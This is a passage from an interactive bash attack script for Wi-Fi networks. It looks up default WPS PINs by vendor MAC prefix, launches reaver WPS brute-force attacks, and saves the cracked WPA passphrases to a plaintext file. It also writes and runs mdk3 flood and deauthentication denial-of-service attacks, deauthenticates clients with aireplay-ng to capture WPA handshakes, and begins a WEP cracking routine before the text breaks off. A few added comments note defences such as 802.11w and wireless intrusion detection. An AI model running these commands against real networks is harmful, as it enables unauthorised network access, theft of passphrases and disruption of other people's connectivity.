  2029. PIN4REAVER=16538061
  2030. ;;
  2031. A4526F)
  2032. echo -e "several possible PINs, ranked in order>
  2033. 16538061 88202907 73767053 16702738 43297917 18355604 "
  2034. PIN4REAVER=16538061
  2035. ;;
  2036. 74888B)
  2037. echo -e "several possible PINs, ranked in order>
  2038. 43297917 73767053 88202907 16538061 16702738 18355604"
  2039. PIN4REAVER=43297917
  2040. ;;
  2041. DC0B1A)
  2042. echo -e "several possible PINs, ranked in order>
  2043. 16538061 16702738 18355604 88202907 73767053 43297917"
  2044. PIN4REAVER=16538061
  2045. ;;
  2046. 5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
  2047. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 "
  2048. PIN4REAVER=$PINWPS1
  2049. ;;
  2050. 002275)
  2051. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2052. PIN4REAVER=$PINWPS1
  2053. ;;
  2054. 08863B)
  2055. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2056. PIN4REAVER=$PINWPS1
  2057. ;;
  2058. 001CDF)
  2059. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2060. PIN4REAVER=$PINWPS1
  2061. ;;
  2062. 00A026)
  2063. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2064. PIN4REAVER=$PINWPS1
  2065. ;;
  2066. 5057F0)
  2067. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2068. PIN4REAVER=$PINWPS1
  2069. ;;
  2070. C83A35 | 00B00C | 081075)
  2071. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2072. PIN4REAVER=$PINWPS1
  2073. ;;
  2074. E47CF9 | 801F02)
  2075. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2076. PIN4REAVER=$PINWPS1
  2077. ;;
  2078. 0022F7)
  2079. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  2080. PIN4REAVER=$PINWPS1
  2081. ;;
  2082. *)
  2083. echo -e $RED"Other Possible Pin$RED:$STAND $PINWPS1"
  2084. PIN4REAVER=$PINWPS1
  2085. ;;
  2086. esac
  2087. fi
  2088.  
  2089. ############## End Of WPSPIN-1.3 Default Pin Generator ##############
  2090.  
  2091. echo ""
  2092. echo $RED"MAC address for$STAND mon0:"$STAND
  2093. macchanger -s mon0
  2094. sleep 4
  2095.  
  2096. ############## End Of Review Information ##############
  2097.  
  2098. ############## Start Of Scan For Clients And Store Collected MAC Addresses Option ##############
  2099. echo ""
  2100. read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND " ClientScan
  2101.  
  2102. if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
  2103. xterm -geometry 111x24+650+0 -l -lf temp1.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  2104. cat temp1.txt | tail -10 | sed 'N;$!P;$!D;$d' | sed -n '/STATION/,$p' >> ClientScan-$AP_bssid.txt
  2105. mv ClientScan-$AP_bssid.txt $HOME/scrypta/Client_Scans/ClientScan-$AP_bssid.txt
  2106. rm temp1.txt
  2107. echo ""
  2108. echo ""
  2109. echo $RED"Collected scan data is stored in$STAND ClientScan-$AP_bssid.txt $RED Location$STAND: $HOME/scrypta/Client_Scans"
  2110. echo ""
  2111. read -p $GREEN"Press [Enter] to continue.$STAND"
  2112. fi
  2113.  
  2114. if [[ $ClientScan == "N" || $ClientScan == "n" ]]; then
  2115. echo ""
  2116. fi
  2117. ############## End Of Scan For Clients And Store Collected MAC Addresses Option ##############
  2118.  
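  2119. ############## Start Of Reaver Attacks And Store Recovered Passkey ##############
        # Each reaver command below passes a -C command that appends the AP ESSID, BSSID, WPS PIN and WPA PSK,
        # in plaintext, to $HOME/scrypta/Recovered-WPA-Passkeys.txt; that file and the $HOME/scrypta tree are
        # the on-disk artifacts to look for on a host where this script was run.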
  2120.  
  2121. clear
  2122. echo $RED"Choose an attack option:"$STAND
  2123. echo $GREEN"[1]$BLUE = Reaver + Auto Generated WPS Pin"$STAND
  2124. echo $GREEN"[2]$BLUE = Reaver (Customisable Options)"$STAND
  2125. echo
  2126. read -s -n1 -p $GREEN"Please choose an option?$STAND: " yourch
  2127. echo
  2128. case $yourch in
  2129.  
  2130. 1)
  2131. clear
  2132. echo $RED"Choose a pin:"
  2133. echo $GREEN"[1]$BLUE WPS Pin1 = $WPSpin1"
  2134. echo $GREEN"[2]$BLUE WPS Pin2 = $WPSpin2"
  2135. echo $GREEN"[3]$BLUE EasyBox Pin = $easybox"
  2136. echo $GREEN"[4]$BLUE Other Pins = $PIN4REAVER"
  2137. read -s -n1 -p $GREEN"Please choose 1, 2, 3, or 4?$STAND: " PinOption
  2138.  
  2139. if [[ $PinOption == "1" ]]; then
  2140. clear
  2141. echo $RED"Reaver Attack Command:"$STAND
  2142. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv"
  2143. echo ""
  2144. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  2145. clear
  2146. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  2147. rm reaver.txt
  2148. echo ""
  2149. fi
  2150.  
  2151. if [[ $PinOption == "2" ]]; then
  2152. clear
  2153. echo $RED"Reaver Attack Command:"$STAND
  2154. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv"
  2155. echo ""
  2156. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  2157. clear
  2158. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  2159. rm reaver.txt
  2160. echo ""
  2161. fi
  2162.  
  2163. if [[ $PinOption == "3" ]]; then
  2164. clear
  2165. echo $RED"Reaver Attack Command:"$STAND
  2166. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv"
  2167. echo ""
  2168. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  2169. clear
  2170. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  2171. rm reaver.txt
  2172. echo ""
  2173. fi
  2174.  
  2175. if [[ $PinOption == "4" ]]; then
  2176. clear
  2177. echo $RED"Reaver Attack Command:"$STAND
  2178. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv"
  2179. echo ""
  2180. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  2181. clear
  2182. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  2183. rm reaver.txt
  2184. echo ""
  2185. fi ;;
  2186.  
  2187. 2)
  2188. clear
  2189. echo $RED"Current Reaver Attack Command:"$STAND
  2190. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
  2191. echo ""
  2192. read -p $GREEN"Please input any additional reaver options (eg: -vv):$STAND " ReaverOptions
  2193. echo ""
  2194. echo $RED"New Reaver Attack Command:"$STAND
  2195. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
  2196. echo ""
  2197. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  2198. reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  2199. rm reaver.txt
  2200.  
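  2201. ################## START OF: MDK3 ACCESS POINT RESET ############################################
        # This section writes $HOME/scrypta/temp/MDK3_AP_Reset.sh and runs it; the generated script starts several
        # mdk3 floods against the chosen BSSID, i.e. a denial of service affecting the access point and its clients.
        # Defensive side: wireless IDS alerting on authentication/deauthentication floods, and 802.11w management-frame protection.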
  2202.  
  2203. echo ""
  2204. echo ""
  2205. echo $GREEN"Would you like to try to reset the access point? Y/n"$STAND
  2206. read a
  2207. if [[ $a == "Y" || $a == "y" || $a = "" ]]; then
  2208.  
  2209. echo "Press the [Enter] button 3 times on the kismet screen, wait 5-10 seconds then press Ctrl+c."
  2210. kismet ncsource=mon0:hop=true
  2211. sleep 5
  2212.  
  2213. echo ""
  2214. echo $RED"Target essid:$STAND $AP_essid"
  2215. echo ""
  2216. read -p $GREEN"Please input the above target essid.$STAND" MDK3_Target
  2217. echo ""
  2218. cat $HOME/scrypta/temp/*.nettxt | sed -n "/$MDK3_Target/,/Channel/p"
  2219.  
  2220. echo 'AP_bssid="'"$AP_bssid"'"' > MDK3_APbssid.txt
  2221. sleep 1
  2222. echo 'AP_channel="'"$AP_channel"'"' > MDK3_APchannel.txt
  2223. sleep 1
  2224. cat MDK3_APbssid.txt | sed 's/AP_bssid=//' | sed 's/"//g' > MDK3_APbssid_1.txt
  2225. sleep 1
  2226. cat MDK3_APchannel.txt | sed 's/AP_channel=//' | sed 's/"//g' > MDK3_APchannel_1.txt
  2227. sleep 1
  2228. echo $AP_bssid > Blacklist.txt
  2229.  
  2230. echo ""
  2231. echo $GREEN"Does the access point support WAP+TKIP?"
  2232. echo $GREEN"[1]$BLUE = Yes."
  2233. echo $GREEN"[2]$BLUE = No."
  2234. echo $GREEN"1 or 2?"$STAND
  2235. read option
  2236.  
  2237. if [[ $option == "1" ]]; then
  2238.  
  2239. read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND " ClientScan
  2240.  
  2241. if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
  2242. xterm -geometry 111x24+650+0 -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  2243. echo ""
  2244. echo ""
  2245. fi
  2246.  
  2247. echo $GREEN"Did the access point have any clients connected to it?"
  2248. echo $GREEN"[1]$BLUE = Yes."
  2249. echo $GREEN"[2]$BLUE = No."
  2250. echo $GREEN"1 or 2?"$STAND
  2251. read MDK3_ClientChoice
  2252.  
  2253. if [[ $MDK3_ClientChoice == "1" ]]; then
  2254.  
  2255. echo '#!/bin/bash
  2256.  
  2257. RED=$(tput setaf 1 && tput bold)
  2258. GREEN=$(tput setaf 2 && tput bold)
  2259. STAND=$(tput sgr0)
  2260.  
  2261. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  2262. sleep 1
  2263. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  2264. echo ""
  2265. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  2266.  
  2267. xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  2268. xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  2269. xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  2270. xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid -j" &
  2271.  
  2272. while :
  2273. do
  2274. xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  2275. sleep 20
  2276. kill `pidof airodump-ng`
  2277. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  2278.  
  2279. fi
  2280.  
  2281. if [[ $MDK3_ClientChoice == "2" ]]; then
  2282.  
  2283. echo '#!/bin/bash
  2284.  
  2285. RED=$(tput setaf 1 && tput bold)
  2286. GREEN=$(tput setaf 2 && tput bold)
  2287. STAND=$(tput sgr0)
  2288.  
  2289. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  2290. sleep 1
  2291. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  2292. echo ""
  2293. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  2294.  
  2295. xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  2296. xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  2297. xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  2298. xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid" &
  2299.  
  2300. while :
  2301. do
  2302. xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  2303. sleep 20
  2304. kill `pidof airodump-ng`
  2305. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  2306.  
  2307. fi
  2308. fi
  2309.  
  2310. if [[ $option == "2" ]]; then
  2311.  
  2312. echo '#!/bin/bash
  2313.  
  2314. RED=$(tput setaf 1 && tput bold)
  2315. GREEN=$(tput setaf 2 && tput bold)
  2316. STAND=$(tput sgr0)
  2317.  
  2318. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  2319. sleep 1
  2320. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  2321. echo ""
  2322. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  2323.  
  2324. xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  2325. xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  2326. xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  2327.  
  2328. while :
  2329. do
  2330. xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  2331. sleep 20
  2332. kill `pidof airodump-ng`
  2333. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  2334.  
  2335. fi
  2336.  
  2337. sleep 1
  2338. chmod +x $HOME/scrypta/temp/MDK3_AP_Reset.sh
  2339. sleep 1
  2340. Eterm -g 100x10-640-500 --cmod "red" -T "Main Window - Press Ctrl+c to exit MDK3" -e sh -c "$HOME/scrypta/temp/MDK3_AP_Reset.sh; bash"
  2341. rm $HOME/scrypta/temp/Blacklist.txt
  2342.  
  2343. if [[ $a == "N" || $a == "n" ]]; then
  2344. echo ""
  2345. fi
  2346. fi
  2347. ################## END OF: MDK3 ACCESS POINT RESET ############################################
  2348.  
  2349. echo "" ;;
  2350. 0) exit 0;;
  2351. *) echo "";
  2352. echo "Press [Enter] to continue. . ." ; read ;;
  2353. esac
  2354.  
  2355. ############## End Of Reaver Attacks And Store Recovered Passkey ##############
  2356.  
  2357. ######################## LOOP ############################################
  2358.  
  2359. clear
  2360. read -s -n1 -p $RED"Choose another target or return to the main menu:$GREEN
  2361. y $BLUE= Choose another target.$GREEN
  2362. n $BLUE= Return to main menu.$GREEN
  2363. Please choose y/n?$STAND: " CONFIRM
  2364. case $CONFIRM in
  2365. n|N|NO|no|No)
  2366. break ;;
  2367. *) echo "" ;;
  2368. esac
  2369. done
  2370.  
  2371. ############## End Of Loop Section ##############
  2372.  
  2373. ############## Start Of Cleanup ##############
  2374.  
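  # Remove this session's scan logs and generated helper scripts.
  # The paths are absolute: this menu arm entered the temp directory with an
  # unchecked `cd`, so a relative `rm *.txt` would delete files from whatever
  # directory the shell was left in if that `cd` had failed.
  # ${HOME:?} aborts instead of expanding to "/scrypta/temp" when HOME is unset.
  rm -f -- "${HOME:?}"/scrypta/temp/*.txt
  rm -f -- "${HOME:?}"/scrypta/temp/*.py
  cd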
  2378. ############## End Of Cleanup ##############
  2379. ;;
  2380.  
  2381. ###### [4] Capture WPA/WPA2 Handshake ######
  4)
    # Menu option 4: pick a WPA/WPA2-PSK access point and one of its clients from
    # airodump-ng scan logs, record traffic to a capture file and send
    # de-authentication frames with aireplay-ng. Works in $HOME/scrypta/temp and
    # moves the capture to $HOME/scrypta/Captured_Handshakes/ at the end.
    #
    # Detection / mitigation: forged de-authentication frames are ignored by
    # stations and APs that negotiate 802.11w protected management frames, and
    # repeated deauth bursts against one BSSID are a common wireless-IDS signature.
    # A captured handshake is only useful for offline guessing, so a long random
    # passphrase (or WPA3-SAE) is the control that matters afterwards.
    #
    # NOTE(review): AP_essid, AP_bssid, AP_channel and the client MAC are parsed out
    # of scan output, i.e. data received over the air, and are expanded unquoted
    # (and inside `xterm -e "..."` strings) below. They should be validated and
    # quoted before they reach a command line or a file name.
    cd $HOME/scrypta/temp
    clear
    echo $RED"Scan for possible targets."
    echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."
    read -p $GREEN"Press [Enter] to start the scan.$STAND"

    # The scan runs in its own xterm; -l -lf makes xterm log the screen output to
    # WPA_Scan.txt, which is the only thing parsed afterwards.
    xterm -geometry 111x35+650+0 -l -lf WPA_Scan.txt -e airodump-ng --encrypt WPA mon0

    # Keep the log from the last line containing CIPHER up to (not including) the
    # first STATION line, keep only lines containing PSK, replace the first '.' on
    # each line with a space and drop entries shown as <length: 0>.
    tac WPA_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | grep "PSK" | sed -r -e 's/\./ /' | sed '/<length: 0>/d' > temp0.txt
    # Build the numbered list shown to the operator: cut a fixed-width prefix off
    # each line, number the lines, keep the first two fields and left-pad the
    # single-digit numbers.
    cat temp0.txt | sed 's/^..........................................................................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
    sleep 1

    PresentedAPs=$(cat PresentedAPs.txt)
    sleep 1
    echo ""
    echo "Please choose an AP"
    echo ""
    echo "$PresentedAPs"
    echo ""
    read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
    echo ""

    # The typed number becomes part of the sed program ("<n>p"); anything that is
    # not a plain line number is interpreted as sed script text.
    Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
    # Fields are split on whitespace: 11 = essid, 1 = bssid, 6 = channel. Only the
    # first word of a network name containing spaces survives this split.
    AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $11 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
    AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
    AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`

    clear
    echo $RED"Chosen Target Details."$STAND
    echo $RED"Aceess Point essid$STAND: $AP_essid"
    echo $RED"Aceess Point bssid$STAND: $AP_bssid"
    echo $RED"Aceess Point Channel Number$STAND: $AP_channel"

    echo ""
    echo $RED"Scan for clients connected to$STAND $AP_essid"
    echo $RED"Once you have identified the client you wish to target press Ctrl-C to exit"$STAND
    read -p $GREEN"Press [Enter] to start the scan."$STAND

    # Second scan, restricted to the chosen channel and BSSID, again logged by xterm.
    xterm -geometry 100x20+650+0 -l -lf WPA_ClientScan.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0

    # Repeats until the operator answers "n" at the prompt at the bottom of the loop.
    while true
    do

      # From the last CIPHER line to the end of the log: replace the first '.',
      # drop the last line and the first six, and keep field 2 of what remains.
      tac WPA_ClientScan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -r -e 's/\./ /' | sed '$d' | sed '1,6d' | awk '{ print $2 }' > temp1.txt
      cat temp1.txt | nl -ba -w 1 -s ': ' > ConnectedClientsScan.txt
      ConnectedClientsScan=$(cat ConnectedClientsScan.txt)

      sleep 2
      echo ""
      echo $RED"Please choose a client MAC address"$STAND
      echo ""
      echo "$ConnectedClientsScan"
      echo ""
      read -p $GREEN"Please input the number of your chosen client MAC address:$STAND " Chosen_Client
      echo ""

      sleep 1
      Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
      echo ""
      echo $RED"Chosen Client MAC Address."$STAND
      echo "$Chosen_Client_MAC"
      echo ""

      # Capture to files prefixed "psk", in the background. This line runs on every
      # pass of the loop and nothing inside the loop stops the previous instance.
      xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --ignore-negative-one -w psk --bssid $AP_bssid mon0" &

      echo $RED"Choose an option:"
      echo $GREEN"[1]$BLUE = De-Authenticate The Chosen Client?."
      echo $GREEN"[2]$BLUE = De-Authenticate All Connected Clients?."
      echo $GREEN"[3]$BLUE = Choose another client."
      echo $GREEN"1, 2, or 3?"$STAND
      read option

      # Option 1 addresses the frames to the chosen client (-c); option 2 omits -c.
      if [[ $option == "1" ]]; then
        echo "De-Authenticate a single client."
        xterm -geometry 100x20+675+350 -e "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid -c $Chosen_Client_MAC mon0"
      fi
      if [[ $option == "2" ]]; then
        echo "De-Authenticate all connected clients."
        xterm -geometry 100x20+675+350 -e "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid mon0"
      fi
      # Option 3 only re-selects a client from the list already parsed above.
      if [[ $option == "3" ]]; then
        clear
        echo "Please choose a client"
        echo ""
        echo "$ConnectedClientsScan"
        echo ""
        read -p $GREEN"Please input the number of the chosen client:$STAND " Chosen_Client
        echo ""
        Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
        echo ""
        echo "Chosen Target Details."
        echo "$Chosen_Client_MAC"
        sleep 4
      fi

      clear
      echo -n $GREEN"Re-send de-auth request or choose another client? (y or n)$STAND: "
      read -e CONFIRM
      case $CONFIRM in
        n|N|NO|no|No)
          break ;;
        *) echo "" ;;
      esac
    done

    # Remove the scan logs and the lists derived from them.
    rm WPA_Scan.txt
    rm temp0.txt
    rm PresentedAPs.txt

    rm WPA_ClientScan.txt
    rm temp1.txt
    rm ConnectedClientsScan.txt

    # pidof returns every process with that name, so this stops all airodump-ng
    # instances on the machine, not only the ones started above.
    kill `pidof airodump-ng`
    rm *.csv
    rm *.netxml
    # NOTE(review): the destination name is built from the unquoted essid. A '/' or
    # glob character in the network name changes where the file lands, and if the
    # glob matches more than one .cap file mv needs a directory as its last argument.
    mv *.cap $HOME/scrypta/Captured_Handshakes/$AP_essid.cap
    cd
    ;;
  2502.  
  2503. ###### [5] WEP Attacks ######
  5)
    # Menu option 5: WEP key recovery workflow. Scans for WEP networks, lets the
    # operator pick one, then follows one of two branches depending on whether the
    # access point had clients, and runs aircrack-ng on the captured data.
    # Recovered keys are appended in plaintext to
    # $HOME/scrypta/Recovered-WPA-Passkeys.txt (WEP keys share the "WPA" file).
    #
    # Defensive reading: everything here depends on the network still offering
    # WEP; retiring WEP removes this arm's target set. The injected traffic
    # (authentication attempts and replayed frames from one source MAC) is the
    # observable part for a wireless IDS.
    #
    # NOTE(review): AP_essid, AP_bssid and AP_channel are parsed out of scan
    # output, i.e. data received over the air, and are used unquoted. AP_essid is
    # also spliced into a command string given to `xterm -e` that contains `&&`
    # and so presumably goes through a shell; shell metacharacters in a network
    # name would then be interpreted on this machine. Validate and quote them.
    cd $HOME/scrypta/temp
    clear
    echo $RED"Scan for possible targets."$STAND
    echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."$STAND
    read -p $GREEN"Press [Enter] to start the scan.$STAND"

    # xterm logs the scan screen to WEP_Scan.txt (-l -lf); only that log is parsed.
    xterm -geometry 111x35+650+0 -l -lf WEP_Scan.txt -e airodump-ng --encrypt WEP mon0

    sleep 1
    # From the last CIPHER line up to the first STATION line, minus the first two
    # lines, the last line and any <length: 0> entries.
    tac WEP_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | sed '1,2d' | sed '$d' | sed '/<length: 0>/d' > temp0.txt
    sleep 1
    # Numbered list of field 10 (used as the essid below).
    PresentedAPs=$(cat temp0.txt | awk '{ print $10 }' | nl -ba -w 1 -s ': ' | sed 's/^[ \t]*//;s/[ \t]*$//' )

    clear
    echo $RED"Please choose a target"$STAND
    echo ""
    echo "$PresentedAPs"
    echo ""
    read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
    echo ""

    # The typed number is pasted into the sed program; fields 10, 1 and 6 of the
    # selected line become essid, bssid and channel.
    Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
    AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $10 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
    AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
    AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`

    clear
    echo $RED"Chosen Target Details."$STAND
    echo $RED"Aceess Point essid$STAND: $AP_essid"
    echo $RED"Aceess Point bssid$STAND: $AP_bssid"
    echo $RED"Aceess Point Channel Number$STAND: $AP_channel"
    echo ""
    echo $RED"Scan for clients connected to$STAND $AP_essid."
    echo $RED"When you've identified a target press Ctrl-C to exit.$STAND"
    read -p $GREEN"Press [Enter] to start the scan."$STAND

    sleep 1
    xterm -geometry 111x35+650+0 -l -lf WEP_ClientScan.txt -e airodump-ng -c $AP_channel --bssid $AP_bssid mon0

    echo ""
    echo $GREEN"Did the access point have any clients connected to it?. (y/n)$STAND"
    read answer

    # Any answer other than y/Y or n/N skips both branches.
    if [[ $answer == "y" || $answer == "Y" ]]; then

      # Lines after the last STATION header, field 2, minus the first two lines
      # and the last line.
      tac WEP_ClientScan.txt | grep 'STATION' -m 1 -B 9999 | tac | awk '{ print $2 }' | sed '1,2d' | sed '$d' > ClientScan.txt
      sleep 2
      PresentedClients=$(cat ClientScan.txt | awk '{ print $1 }' | nl -ba -w 1 -s ': ' | sed 's/^[ \t]*//;s/[ \t]*$//')

      sleep 2
      clear
      echo "Please choose a client"
      echo ""
      echo "$PresentedClients"
      echo ""

      read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_Client
      echo ""

      Chosen_ClientMAC=$(cat ClientScan.txt | sed -n ""$Chosen_Client"p")
      # NOTE(review): ClientMAC is computed from Chosen_AP_Details with the same
      # expression as AP_bssid above; Chosen_ClientMAC is not read again in this arm.
      ClientMAC=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`

      echo $RED"You've chosen:"
      echo $RED"Client$STAND: $ClientMAC"
      echo ""

      # Repeats until the operator confirms success.
      while true
      do

        read -p $GREEN"Press [Enter] to start the attack.$STAND"
        # Three background xterms: a capture writing files prefixed "capture" and
        # two aireplay-ng injection runs (-1 and -3) using ClientMAC as source.
        xterm -e "airodump-ng -w capture --bssid $AP_bssid -c $AP_channel mon0" &
